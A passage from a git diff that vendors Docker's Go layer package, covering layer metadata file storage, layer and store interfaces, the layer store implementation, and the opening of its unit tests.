"diff")) + if err != nil { + return "", err + } + + dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + if err != nil { + return "", err + } + + return DiffID(dgst), nil +} + +func (fms *fileMetadataStore) GetCacheID(layer ChainID) (string, error) { + contentBytes, err := ioutil.ReadFile(fms.getLayerFilename(layer, "cache-id")) + if err != nil { + return "", err + } + content := strings.TrimSpace(string(contentBytes)) + + if !stringIDRegexp.MatchString(content) { + return "", errors.New("invalid cache id value") + } + + return content, nil +} + +func (fms *fileMetadataStore) GetDescriptor(layer ChainID) (distribution.Descriptor, error) { + content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "descriptor.json")) + if err != nil { + if os.IsNotExist(err) { + // only return empty descriptor to represent what is stored + return distribution.Descriptor{}, nil + } + return distribution.Descriptor{}, err + } + + var ref distribution.Descriptor + err = json.Unmarshal(content, &ref) + if err != nil { + return distribution.Descriptor{}, err + } + return ref, err +} + +func (fms *fileMetadataStore) TarSplitReader(layer ChainID) (io.ReadCloser, error) { + fz, err := os.Open(fms.getLayerFilename(layer, "tar-split.json.gz")) + if err != nil { + return nil, err + } + f, err := gzip.NewReader(fz) + if err != nil { + return nil, err + } + + return ioutils.NewReadCloserWrapper(f, func() error { + f.Close() + return fz.Close() + }), nil +} + +func (fms *fileMetadataStore) SetMountID(mount string, mountID string) error { + if err := os.MkdirAll(fms.getMountDirectory(mount), 0755); err != nil { + return err + } + return ioutil.WriteFile(fms.getMountFilename(mount, "mount-id"), []byte(mountID), 0644) +} + +func (fms *fileMetadataStore) SetInitID(mount string, init string) error { + if err := os.MkdirAll(fms.getMountDirectory(mount), 0755); err != nil { + return err + } + return ioutil.WriteFile(fms.getMountFilename(mount, "init-id"), []byte(init), 0644) +} + +func (fms *fileMetadataStore) SetMountParent(mount string, parent ChainID) error { + if err := os.MkdirAll(fms.getMountDirectory(mount), 0755); err != nil { + return err + } + return ioutil.WriteFile(fms.getMountFilename(mount, "parent"), []byte(digest.Digest(parent).String()), 0644) +} + +func (fms *fileMetadataStore) GetMountID(mount string) (string, error) { + contentBytes, err := ioutil.ReadFile(fms.getMountFilename(mount, "mount-id")) + if err != nil { + return "", err + } + content := strings.TrimSpace(string(contentBytes)) + + if !stringIDRegexp.MatchString(content) { + return "", errors.New("invalid mount id value") + } + + return content, nil +} + +func (fms *fileMetadataStore) GetInitID(mount string) (string, error) { + contentBytes, err := ioutil.ReadFile(fms.getMountFilename(mount, "init-id")) + if err != nil { + if os.IsNotExist(err) { + return "", nil + } + return "", err + } + content := strings.TrimSpace(string(contentBytes)) + + if !stringIDRegexp.MatchString(content) { + return "", errors.New("invalid init id value") + } + + return content, nil +} + +func (fms *fileMetadataStore) GetMountParent(mount string) (ChainID, error) { + content, err := ioutil.ReadFile(fms.getMountFilename(mount, "parent")) + if err != nil { + if os.IsNotExist(err) { + return "", nil + } + return "", err + } + + dgst, err := digest.ParseDigest(strings.TrimSpace(string(content))) + if err != nil { + return "", err + } + + return ChainID(dgst), nil +} + +func (fms *fileMetadataStore) List() ([]ChainID, []string, error) { + var ids []ChainID + for _, algorithm := range supportedAlgorithms { + fileInfos, err := ioutil.ReadDir(filepath.Join(fms.root, string(algorithm))) + if err != nil { + if os.IsNotExist(err) { + continue + } + return nil, nil, err + } + + for _, fi := range fileInfos { + if fi.IsDir() && fi.Name() != "mounts" { + dgst := digest.NewDigestFromHex(string(algorithm), fi.Name()) + if err := dgst.Validate(); err != nil { + logrus.Debugf("Ignoring invalid digest %s:%s", algorithm, fi.Name()) + } else { + ids = append(ids, ChainID(dgst)) + } + } + } + } + + fileInfos, err := ioutil.ReadDir(filepath.Join(fms.root, "mounts")) + if err != nil { + if os.IsNotExist(err) { + return ids, []string{}, nil + } + return nil, nil, err + } + + var mounts []string + for _, fi := range fileInfos { + if fi.IsDir() { + mounts = append(mounts, fi.Name()) + } + } + + return ids, mounts, nil +} + +func (fms *fileMetadataStore) Remove(layer ChainID) error { + return os.RemoveAll(fms.getLayerDirectory(layer)) +} + +func (fms *fileMetadataStore) RemoveMount(mount string) error { + return os.RemoveAll(fms.getMountDirectory(mount)) +} diff --git a/vendor/github.com/docker/docker/layer/filestore_test.go b/vendor/github.com/docker/docker/layer/filestore_test.go new file mode 100644 index 0000000000..55e3b28530 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/filestore_test.go @@ -0,0 +1,104 @@ +package layer + +import ( + "fmt" + "io/ioutil" + "math/rand" + "os" + "path/filepath" + "strings" + "syscall" + "testing" + + "github.com/docker/distribution/digest" +) + +func randomLayerID(seed int64) ChainID { + r := rand.New(rand.NewSource(seed)) + + return ChainID(digest.FromBytes([]byte(fmt.Sprintf("%d", r.Int63())))) +} + +func newFileMetadataStore(t *testing.T) (*fileMetadataStore, string, func()) { + td, err := ioutil.TempDir("", "layers-") + if err != nil { + t.Fatal(err) + } + fms, err := NewFSMetadataStore(td) + if err != nil { + t.Fatal(err) + } + + return fms.(*fileMetadataStore), td, func() { + if err := os.RemoveAll(td); err != nil { + t.Logf("Failed to cleanup %q: %s", td, err) + } + } +} + +func assertNotDirectoryError(t *testing.T, err error) { + perr, ok := err.(*os.PathError) + if !ok { + t.Fatalf("Unexpected error %#v, expected path error", err) + } + + if perr.Err != syscall.ENOTDIR { + t.Fatalf("Unexpected error %s, expected %s", perr.Err, syscall.ENOTDIR) + } +} + +func TestCommitFailure(t *testing.T) { + fms, td, cleanup := newFileMetadataStore(t) + defer cleanup() + + if err := ioutil.WriteFile(filepath.Join(td, "sha256"), []byte("was here first!"), 0644); err != nil { + t.Fatal(err) + } + + tx, err := fms.StartTransaction() + if err != nil { + t.Fatal(err) + } + + if err := tx.SetSize(0); err != nil { + t.Fatal(err) + } + + err = tx.Commit(randomLayerID(5)) + if err == nil { + t.Fatalf("Expected error committing with invalid layer parent directory") + } + assertNotDirectoryError(t, err) +} + +func TestStartTransactionFailure(t *testing.T) { + fms, td, cleanup := newFileMetadataStore(t) + defer cleanup() + + if err := ioutil.WriteFile(filepath.Join(td, "tmp"), []byte("was here first!"), 0644); err != nil { + t.Fatal(err) + } + + _, err := fms.StartTransaction() + if err == nil { + t.Fatalf("Expected error starting transaction with invalid layer parent directory") + } + assertNotDirectoryError(t, err) + + if err := os.Remove(filepath.Join(td, "tmp")); err != nil { + t.Fatal(err) + } + + tx, err := fms.StartTransaction() + if err != nil { + t.Fatal(err) + } + + if expected := filepath.Join(td, "tmp"); strings.HasPrefix(expected, tx.String()) { + t.Fatalf("Unexpected transaction string %q, expected prefix %q", tx.String(), expected) + } + + if err := tx.Cancel(); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/layer/layer.go b/vendor/github.com/docker/docker/layer/layer.go new file mode 100644 index 0000000000..ec1d4346d7 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer.go @@ -0,0 +1,275 @@ +// Package layer is package for managing read-only +// and read-write mounts on the union file system +// driver. Read-only mounts are referenced using a +// content hash and are protected from mutation in +// the exposed interface. The tar format is used +// to create read-only layers and export both +// read-only and writable layers. The exported +// tar data for a read-only layer should match +// the tar used to create the layer. +package layer + +import ( + "errors" + "io" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/pkg/archive" +) + +var ( + // ErrLayerDoesNotExist is used when an operation is + // attempted on a layer which does not exist. + ErrLayerDoesNotExist = errors.New("layer does not exist") + + // ErrLayerNotRetained is used when a release is + // attempted on a layer which is not retained. + ErrLayerNotRetained = errors.New("layer not retained") + + // ErrMountDoesNotExist is used when an operation is + // attempted on a mount layer which does not exist. + ErrMountDoesNotExist = errors.New("mount does not exist") + + // ErrMountNameConflict is used when a mount is attempted + // to be created but there is already a mount with the name + // used for creation. + ErrMountNameConflict = errors.New("mount already exists with name") + + // ErrActiveMount is used when an operation on a + // mount is attempted but the layer is still + // mounted and the operation cannot be performed. + ErrActiveMount = errors.New("mount still active") + + // ErrNotMounted is used when requesting an active + // mount but the layer is not mounted. + ErrNotMounted = errors.New("not mounted") + + // ErrMaxDepthExceeded is used when a layer is attempted + // to be created which would result in a layer depth + // greater than the 125 max. + ErrMaxDepthExceeded = errors.New("max depth exceeded") + + // ErrNotSupported is used when the action is not supported + // on the current platform + ErrNotSupported = errors.New("not support on this platform") +) + +// ChainID is the content-addressable ID of a layer. +type ChainID digest.Digest + +// String returns a string rendition of a layer ID +func (id ChainID) String() string { + return string(id) +} + +// DiffID is the hash of an individual layer tar. +type DiffID digest.Digest + +// String returns a string rendition of a layer DiffID +func (diffID DiffID) String() string { + return string(diffID) +} + +// TarStreamer represents an object which may +// have its contents exported as a tar stream. +type TarStreamer interface { + // TarStream returns a tar archive stream + // for the contents of a layer. + TarStream() (io.ReadCloser, error) +} + +// Layer represents a read-only layer +type Layer interface { + TarStreamer + + // TarStreamFrom returns a tar archive stream for all the layer chain with + // arbitrary depth. + TarStreamFrom(ChainID) (io.ReadCloser, error) + + // ChainID returns the content hash of the entire layer chain. The hash + // chain is made up of DiffID of top layer and all of its parents. + ChainID() ChainID + + // DiffID returns the content hash of the layer + // tar stream used to create this layer. + DiffID() DiffID + + // Parent returns the next layer in the layer chain. + Parent() Layer + + // Size returns the size of the entire layer chain. The size + // is calculated from the total size of all files in the layers. + Size() (int64, error) + + // DiffSize returns the size difference of the top layer + // from parent layer. + DiffSize() (int64, error) + + // Metadata returns the low level storage metadata associated + // with layer. + Metadata() (map[string]string, error) +} + +// RWLayer represents a layer which is +// read and writable +type RWLayer interface { + TarStreamer + + // Name of mounted layer + Name() string + + // Parent returns the layer which the writable + // layer was created from. + Parent() Layer + + // Mount mounts the RWLayer and returns the filesystem path + // the to the writable layer. + Mount(mountLabel string) (string, error) + + // Unmount unmounts the RWLayer. This should be called + // for every mount. If there are multiple mount calls + // this operation will only decrement the internal mount counter. + Unmount() error + + // Size represents the size of the writable layer + // as calculated by the total size of the files + // changed in the mutable layer. + Size() (int64, error) + + // Changes returns the set of changes for the mutable layer + // from the base layer. + Changes() ([]archive.Change, error) + + // Metadata returns the low level metadata for the mutable layer + Metadata() (map[string]string, error) +} + +// Metadata holds information about a +// read-only layer +type Metadata struct { + // ChainID is the content hash of the layer + ChainID ChainID + + // DiffID is the hash of the tar data used to + // create the layer + DiffID DiffID + + // Size is the size of the layer and all parents + Size int64 + + // DiffSize is the size of the top layer + DiffSize int64 +} + +// MountInit is a function to initialize a +// writable mount. Changes made here will +// not be included in the Tar stream of the +// RWLayer. +type MountInit func(root string) error + +// Store represents a backend for managing both +// read-only and read-write layers. +type Store interface { + Register(io.Reader, ChainID) (Layer, error) + Get(ChainID) (Layer, error) + Map() map[ChainID]Layer + Release(Layer) ([]Metadata, error) + + CreateRWLayer(id string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) + GetRWLayer(id string) (RWLayer, error) + GetMountID(id string) (string, error) + ReleaseRWLayer(RWLayer) ([]Metadata, error) + + Cleanup() error + DriverStatus() [][2]string + DriverName() string +} + +// DescribableStore represents a layer store capable of storing +// descriptors for layers. +type DescribableStore interface { + RegisterWithDescriptor(io.Reader, ChainID, distribution.Descriptor) (Layer, error) +} + +// MetadataTransaction represents functions for setting layer metadata +// with a single transaction. +type MetadataTransaction interface { + SetSize(int64) error + SetParent(parent ChainID) error + SetDiffID(DiffID) error + SetCacheID(string) error + SetDescriptor(distribution.Descriptor) error + TarSplitWriter(compressInput bool) (io.WriteCloser, error) + + Commit(ChainID) error + Cancel() error + String() string +} + +// MetadataStore represents a backend for persisting +// metadata about layers and providing the metadata +// for restoring a Store. +type MetadataStore interface { + // StartTransaction starts an update for new metadata + // which will be used to represent an ID on commit. + StartTransaction() (MetadataTransaction, error) + + GetSize(ChainID) (int64, error) + GetParent(ChainID) (ChainID, error) + GetDiffID(ChainID) (DiffID, error) + GetCacheID(ChainID) (string, error) + GetDescriptor(ChainID) (distribution.Descriptor, error) + TarSplitReader(ChainID) (io.ReadCloser, error) + + SetMountID(string, string) error + SetInitID(string, string) error + SetMountParent(string, ChainID) error + + GetMountID(string) (string, error) + GetInitID(string) (string, error) + GetMountParent(string) (ChainID, error) + + // List returns the full list of referenced + // read-only and read-write layers + List() ([]ChainID, []string, error) + + Remove(ChainID) error + RemoveMount(string) error +} + +// CreateChainID returns ID for a layerDigest slice +func CreateChainID(dgsts []DiffID) ChainID { + return createChainIDFromParent("", dgsts...) +} + +func createChainIDFromParent(parent ChainID, dgsts ...DiffID) ChainID { + if len(dgsts) == 0 { + return parent + } + if parent == "" { + return createChainIDFromParent(ChainID(dgsts[0]), dgsts[1:]...) + } + // H = "H(n-1) SHA256(n)" + dgst := digest.FromBytes([]byte(string(parent) + " " + string(dgsts[0]))) + return createChainIDFromParent(ChainID(dgst), dgsts[1:]...) +} + +// ReleaseAndLog releases the provided layer from the given layer +// store, logging any error and release metadata +func ReleaseAndLog(ls Store, l Layer) { + metadata, err := ls.Release(l) + if err != nil { + logrus.Errorf("Error releasing layer %s: %v", l.ChainID(), err) + } + LogReleaseMetadata(metadata) +} + +// LogReleaseMetadata logs a metadata array, uses this to +// ensure consistent logging for release metadata +func LogReleaseMetadata(metadatas []Metadata) { + for _, metadata := range metadatas { + logrus.Infof("Layer %s cleaned up", metadata.ChainID) + } +} diff --git a/vendor/github.com/docker/docker/layer/layer_store.go b/vendor/github.com/docker/docker/layer/layer_store.go new file mode 100644 index 0000000000..1a1ff9fe59 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_store.go @@ -0,0 +1,684 @@ +package layer + +import ( + "errors" + "fmt" + "io" + "io/ioutil" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/stringid" + "github.com/vbatts/tar-split/tar/asm" + "github.com/vbatts/tar-split/tar/storage" +) + +// maxLayerDepth represents the maximum number of +// layers which can be chained together. 125 was +// chosen to account for the 127 max in some +// graphdrivers plus the 2 additional layers +// used to create a rwlayer. +const maxLayerDepth = 125 + +type layerStore struct { + store MetadataStore + driver graphdriver.Driver + + layerMap map[ChainID]*roLayer + layerL sync.Mutex + + mounts map[string]*mountedLayer + mountL sync.Mutex +} + +// StoreOptions are the options used to create a new Store instance +type StoreOptions struct { + StorePath string + MetadataStorePathTemplate string + GraphDriver string + GraphDriverOptions []string + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + PluginGetter plugingetter.PluginGetter + ExperimentalEnabled bool +} + +// NewStoreFromOptions creates a new Store instance +func NewStoreFromOptions(options StoreOptions) (Store, error) { + driver, err := graphdriver.New(options.GraphDriver, options.PluginGetter, graphdriver.Options{ + Root: options.StorePath, + DriverOptions: options.GraphDriverOptions, + UIDMaps: options.UIDMaps, + GIDMaps: options.GIDMaps, + ExperimentalEnabled: options.ExperimentalEnabled, + }) + if err != nil { + return nil, fmt.Errorf("error initializing graphdriver: %v", err) + } + logrus.Debugf("Using graph driver %s", driver) + + fms, err := NewFSMetadataStore(fmt.Sprintf(options.MetadataStorePathTemplate, driver)) + if err != nil { + return nil, err + } + + return NewStoreFromGraphDriver(fms, driver) +} + +// NewStoreFromGraphDriver creates a new Store instance using the provided +// metadata store and graph driver. The metadata store will be used to restore +// the Store. +func NewStoreFromGraphDriver(store MetadataStore, driver graphdriver.Driver) (Store, error) { + ls := &layerStore{ + store: store, + driver: driver, + layerMap: map[ChainID]*roLayer{}, + mounts: map[string]*mountedLayer{}, + } + + ids, mounts, err := store.List() + if err != nil { + return nil, err + } + + for _, id := range ids { + l, err := ls.loadLayer(id) + if err != nil { + logrus.Debugf("Failed to load layer %s: %s", id, err) + continue + } + if l.parent != nil { + l.parent.referenceCount++ + } + } + + for _, mount := range mounts { + if err := ls.loadMount(mount); err != nil { + logrus.Debugf("Failed to load mount %s: %s", mount, err) + } + } + + return ls, nil +} + +func (ls *layerStore) loadLayer(layer ChainID) (*roLayer, error) { + cl, ok := ls.layerMap[layer] + if ok { + return cl, nil + } + + diff, err := ls.store.GetDiffID(layer) + if err != nil { + return nil, fmt.Errorf("failed to get diff id for %s: %s", layer, err) + } + + size, err := ls.store.GetSize(layer) + if err != nil { + return nil, fmt.Errorf("failed to get size for %s: %s", layer, err) + } + + cacheID, err := ls.store.GetCacheID(layer) + if err != nil { + return nil, fmt.Errorf("failed to get cache id for %s: %s", layer, err) + } + + parent, err := ls.store.GetParent(layer) + if err != nil { + return nil, fmt.Errorf("failed to get parent for %s: %s", layer, err) + } + + descriptor, err := ls.store.GetDescriptor(layer) + if err != nil { + return nil, fmt.Errorf("failed to get descriptor for %s: %s", layer, err) + } + + cl = &roLayer{ + chainID: layer, + diffID: diff, + size: size, + cacheID: cacheID, + layerStore: ls, + references: map[Layer]struct{}{}, + descriptor: descriptor, + } + + if parent != "" { + p, err := ls.loadLayer(parent) + if err != nil { + return nil, err + } + cl.parent = p + } + + ls.layerMap[cl.chainID] = cl + + return cl, nil +} + +func (ls *layerStore) loadMount(mount string) error { + if _, ok := ls.mounts[mount]; ok { + return nil + } + + mountID, err := ls.store.GetMountID(mount) + if err != nil { + return err + } + + initID, err := ls.store.GetInitID(mount) + if err != nil { + return err + } + + parent, err := ls.store.GetMountParent(mount) + if err != nil { + return err + } + + ml := &mountedLayer{ + name: mount, + mountID: mountID, + initID: initID, + layerStore: ls, + references: map[RWLayer]*referencedRWLayer{}, + } + + if parent != "" { + p, err := ls.loadLayer(parent) + if err != nil { + return err + } + ml.parent = p + + p.referenceCount++ + } + + ls.mounts[ml.name] = ml + + return nil +} + +func (ls *layerStore) applyTar(tx MetadataTransaction, ts io.Reader, parent string, layer *roLayer) error { + digester := digest.Canonical.New() + tr := io.TeeReader(ts, digester.Hash()) + + tsw, err := tx.TarSplitWriter(true) + if err != nil { + return err + } + metaPacker := storage.NewJSONPacker(tsw) + defer tsw.Close() + + // we're passing nil here for the file putter, because the ApplyDiff will + // handle the extraction of the archive + rdr, err := asm.NewInputTarStream(tr, metaPacker, nil) + if err != nil { + return err + } + + applySize, err := ls.driver.ApplyDiff(layer.cacheID, parent, rdr) + if err != nil { + return err + } + + // Discard trailing data but ensure metadata is picked up to reconstruct stream + io.Copy(ioutil.Discard, rdr) // ignore error as reader may be closed + + layer.size = applySize + layer.diffID = DiffID(digester.Digest()) + + logrus.Debugf("Applied tar %s to %s, size: %d", layer.diffID, layer.cacheID, applySize) + + return nil +} + +func (ls *layerStore) Register(ts io.Reader, parent ChainID) (Layer, error) { + return ls.registerWithDescriptor(ts, parent, distribution.Descriptor{}) +} + +func (ls *layerStore) registerWithDescriptor(ts io.Reader, parent ChainID, descriptor distribution.Descriptor) (Layer, error) { + // err is used to hold the error which will always trigger + // cleanup of creates sources but may not be an error returned + // to the caller (already exists). + var err error + var pid string + var p *roLayer + if string(parent) != "" { + p = ls.get(parent) + if p == nil { + return nil, ErrLayerDoesNotExist + } + pid = p.cacheID + // Release parent chain if error + defer func() { + if err != nil { + ls.layerL.Lock() + ls.releaseLayer(p) + ls.layerL.Unlock() + } + }() + if p.depth() >= maxLayerDepth { + err = ErrMaxDepthExceeded + return nil, err + } + } + + // Create new roLayer + layer := &roLayer{ + parent: p, + cacheID: stringid.GenerateRandomID(), + referenceCount: 1, + layerStore: ls, + references: map[Layer]struct{}{}, + descriptor: descriptor, + } + + if err = ls.driver.Create(layer.cacheID, pid, nil); err != nil { + return nil, err + } + + tx, err := ls.store.StartTransaction() + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + logrus.Debugf("Cleaning up layer %s: %v", layer.cacheID, err) + if err := ls.driver.Remove(layer.cacheID); err != nil { + logrus.Errorf("Error cleaning up cache layer %s: %v", layer.cacheID, err) + } + if err := tx.Cancel(); err != nil { + logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err) + } + } + }() + + if err = ls.applyTar(tx, ts, pid, layer); err != nil { + return nil, err + } + + if layer.parent == nil { + layer.chainID = ChainID(layer.diffID) + } else { + layer.chainID = createChainIDFromParent(layer.parent.chainID, layer.diffID) + } + + if err = storeLayer(tx, layer); err != nil { + return nil, err + } + + ls.layerL.Lock() + defer ls.layerL.Unlock() + + if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil { + // Set error for cleanup, but do not return the error + err = errors.New("layer already exists") + return existingLayer.getReference(), nil + } + + if err = tx.Commit(layer.chainID); err != nil { + return nil, err + } + + ls.layerMap[layer.chainID] = layer + + return layer.getReference(), nil +} + +func (ls *layerStore) getWithoutLock(layer ChainID) *roLayer { + l, ok := ls.layerMap[layer] + if !ok { + return nil + } + + l.referenceCount++ + + return l +} + +func (ls *layerStore) get(l ChainID) *roLayer { + ls.layerL.Lock() + defer ls.layerL.Unlock() + return ls.getWithoutLock(l) +} + +func (ls *layerStore) Get(l ChainID) (Layer, error) { + ls.layerL.Lock() + defer ls.layerL.Unlock() + + layer := ls.getWithoutLock(l) + if layer == nil { + return nil, ErrLayerDoesNotExist + } + + return layer.getReference(), nil +} + +func (ls *layerStore) Map() map[ChainID]Layer { + ls.layerL.Lock() + defer ls.layerL.Unlock() + + layers := map[ChainID]Layer{} + + for k, v := range ls.layerMap { + layers[k] = v + } + + return layers +} + +func (ls *layerStore) deleteLayer(layer *roLayer, metadata *Metadata) error { + err := ls.driver.Remove(layer.cacheID) + if err != nil { + return err + } + + err = ls.store.Remove(layer.chainID) + if err != nil { + return err + } + metadata.DiffID = layer.diffID + metadata.ChainID = layer.chainID + metadata.Size, err = layer.Size() + if err != nil { + return err + } + metadata.DiffSize = layer.size + + return nil +} + +func (ls *layerStore) releaseLayer(l *roLayer) ([]Metadata, error) { + depth := 0 + removed := []Metadata{} + for { + if l.referenceCount == 0 { + panic("layer not retained") + } + l.referenceCount-- + if l.referenceCount != 0 { + return removed, nil + } + + if len(removed) == 0 && depth > 0 { + panic("cannot remove layer with child") + } + if l.hasReferences() { + panic("cannot delete referenced layer") + } + var metadata Metadata + if err := ls.deleteLayer(l, &metadata); err != nil { + return nil, err + } + + delete(ls.layerMap, l.chainID) + removed = append(removed, metadata) + + if l.parent == nil { + return removed, nil + } + + depth++ + l = l.parent + } +} + +func (ls *layerStore) Release(l Layer) ([]Metadata, error) { + ls.layerL.Lock() + defer ls.layerL.Unlock() + layer, ok := ls.layerMap[l.ChainID()] + if !ok { + return []Metadata{}, nil + } + if !layer.hasReference(l) { + return nil, ErrLayerNotRetained + } + + layer.deleteReference(l) + + return ls.releaseLayer(layer) +} + +func (ls *layerStore) CreateRWLayer(name string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + m, ok := ls.mounts[name] + if ok { + return nil, ErrMountNameConflict + } + + var err error + var pid string + var p *roLayer + if string(parent) != "" { + p = ls.get(parent) + if p == nil { + return nil, ErrLayerDoesNotExist + } + pid = p.cacheID + + // Release parent chain if error + defer func() { + if err != nil { + ls.layerL.Lock() + ls.releaseLayer(p) + ls.layerL.Unlock() + } + }() + } + + m = &mountedLayer{ + name: name, + parent: p, + mountID: ls.mountID(name), + layerStore: ls, + references: map[RWLayer]*referencedRWLayer{}, + } + + if initFunc != nil { + pid, err = ls.initMount(m.mountID, pid, mountLabel, initFunc, storageOpt) + if err != nil { + return nil, err + } + m.initID = pid + } + + createOpts := &graphdriver.CreateOpts{ + StorageOpt: storageOpt, + } + + if err = ls.driver.CreateReadWrite(m.mountID, pid, createOpts); err != nil { + return nil, err + } + + if err = ls.saveMount(m); err != nil { + return nil, err + } + + return m.getReference(), nil +} + +func (ls *layerStore) GetRWLayer(id string) (RWLayer, error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + mount, ok := ls.mounts[id] + if !ok { + return nil, ErrMountDoesNotExist + } + + return mount.getReference(), nil +} + +func (ls *layerStore) GetMountID(id string) (string, error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + mount, ok := ls.mounts[id] + if !ok { + return "", ErrMountDoesNotExist + } + logrus.Debugf("GetMountID id: %s -> mountID: %s", id, mount.mountID) + + return mount.mountID, nil +} + +func (ls *layerStore) ReleaseRWLayer(l RWLayer) ([]Metadata, error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + m, ok := ls.mounts[l.Name()] + if !ok { + return []Metadata{}, nil + } + + if err := m.deleteReference(l); err != nil { + return nil, err + } + + if m.hasReferences() { + return []Metadata{}, nil + } + + if err := ls.driver.Remove(m.mountID); err != nil { + logrus.Errorf("Error removing mounted layer %s: %s", m.name, err) + m.retakeReference(l) + return nil, err + } + + if m.initID != "" { + if err := ls.driver.Remove(m.initID); err != nil { + logrus.Errorf("Error removing init layer %s: %s", m.name, err) + m.retakeReference(l) + return nil, err + } + } + + if err := ls.store.RemoveMount(m.name); err != nil { + logrus.Errorf("Error removing mount metadata: %s: %s", m.name, err) + m.retakeReference(l) + return nil, err + } + + delete(ls.mounts, m.Name()) + + ls.layerL.Lock() + defer ls.layerL.Unlock() + if m.parent != nil { + return ls.releaseLayer(m.parent) + } + + return []Metadata{}, nil +} + +func (ls *layerStore) saveMount(mount *mountedLayer) error { + if err := ls.store.SetMountID(mount.name, mount.mountID); err != nil { + return err + } + + if mount.initID != "" { + if err := ls.store.SetInitID(mount.name, mount.initID); err != nil { + return err + } + } + + if mount.parent != nil { + if err := ls.store.SetMountParent(mount.name, mount.parent.chainID); err != nil { + return err + } + } + + ls.mounts[mount.name] = mount + + return nil +} + +func (ls *layerStore) initMount(graphID, parent, mountLabel string, initFunc MountInit, storageOpt map[string]string) (string, error) { + // Use "-init" to maintain compatibility with graph drivers + // which are expecting this layer with this special name. If all + // graph drivers can be updated to not rely on knowing about this layer + // then the initID should be randomly generated. + initID := fmt.Sprintf("%s-init", graphID) + + createOpts := &graphdriver.CreateOpts{ + MountLabel: mountLabel, + StorageOpt: storageOpt, + } + + if err := ls.driver.CreateReadWrite(initID, parent, createOpts); err != nil { + return "", err + } + p, err := ls.driver.Get(initID, "") + if err != nil { + return "", err + } + + if err := initFunc(p); err != nil { + ls.driver.Put(initID) + return "", err + } + + if err := ls.driver.Put(initID); err != nil { + return "", err + } + + return initID, nil +} + +func (ls *layerStore) assembleTarTo(graphID string, metadata io.ReadCloser, size *int64, w io.Writer) error { + diffDriver, ok := ls.driver.(graphdriver.DiffGetterDriver) + if !ok { + diffDriver = &naiveDiffPathDriver{ls.driver} + } + + defer metadata.Close() + + // get our relative path to the container + fileGetCloser, err := diffDriver.DiffGetter(graphID) + if err != nil { + return err + } + defer fileGetCloser.Close() + + metaUnpacker := storage.NewJSONUnpacker(metadata) + upackerCounter := &unpackSizeCounter{metaUnpacker, size} + logrus.Debugf("Assembling tar data for %s", graphID) + return asm.WriteOutputTarStream(fileGetCloser, upackerCounter, w) +} + +func (ls *layerStore) Cleanup() error { + return ls.driver.Cleanup() +} + +func (ls *layerStore) DriverStatus() [][2]string { + return ls.driver.Status() +} + +func (ls *layerStore) DriverName() string { + return ls.driver.String() +} + +type naiveDiffPathDriver struct { + graphdriver.Driver +} + +type fileGetPutter struct { + storage.FileGetter + driver graphdriver.Driver + id string +} + +func (w *fileGetPutter) Close() error { + return w.driver.Put(w.id) +} + +func (n *naiveDiffPathDriver) DiffGetter(id string) (graphdriver.FileGetCloser, error) { + p, err := n.Driver.Get(id, "") + if err != nil { + return nil, err + } + return &fileGetPutter{storage.NewPathFileGetter(p), n.Driver, id}, nil +} diff --git a/vendor/github.com/docker/docker/layer/layer_store_windows.go b/vendor/github.com/docker/docker/layer/layer_store_windows.go new file mode 100644 index 0000000000..1276a912cc --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_store_windows.go @@ -0,0 +1,11 @@ +package layer + +import ( + "io" + + "github.com/docker/distribution" +) + +func (ls *layerStore) RegisterWithDescriptor(ts io.Reader, parent ChainID, descriptor distribution.Descriptor) (Layer, error) { + return ls.registerWithDescriptor(ts, parent, descriptor) +} diff --git a/vendor/github.com/docker/docker/layer/layer_test.go b/vendor/github.com/docker/docker/layer/layer_test.go new file mode 100644 index 0000000000..10712df998 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_test.go @@ -0,0 +1,771 @@ +package layer + +import ( + "bytes" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strings" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/vfs" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/stringid" +) + +func init() { + graphdriver.ApplyUncompressedLayer = archive.UnpackLayer + vfs.CopyWithTar = archive.CopyWithTar +} + +func newVFSGraphDriver(td string) (graphdriver.Driver, error) { + uidMap := []idtools.IDMap{ + { + ContainerID: 0, + HostID: os.Getuid(), + Size: 1, + }, + } + gidMap := []idtools.IDMap{ + { + ContainerID: 0, + HostID: os.Getgid(), + Size: 1, + }, + } + + options := graphdriver.Options{Root: td, UIDMaps: uidMap, GIDMaps: gidMap} + return graphdriver.GetDriver("vfs", nil, options) +} + +func newTestGraphDriver(t *testing.T) (graphdriver.Driver, func()) { + td, err := ioutil.TempDir("", "graph-") + if err != nil { + t.Fatal(err) + } + + driver, err := newVFSGraphDriver(td) + if err != nil { + t.Fatal(err) + } + + return driver, func() { + os.RemoveAll(td) + } +} + +func newTestStore(t *testing.T) (Store, string, func()) { + td, err := ioutil.TempDir("", "layerstore-") + if err != nil { + t.Fatal(err) + } + + graph, graphcleanup := newTestGraphDriver(t) + fms, err := NewFSMetadataStore(td) + if err != nil { + t.Fatal(err) + } + ls, err := NewStoreFromGraphDriver(fms, graph) + if err != nil { + 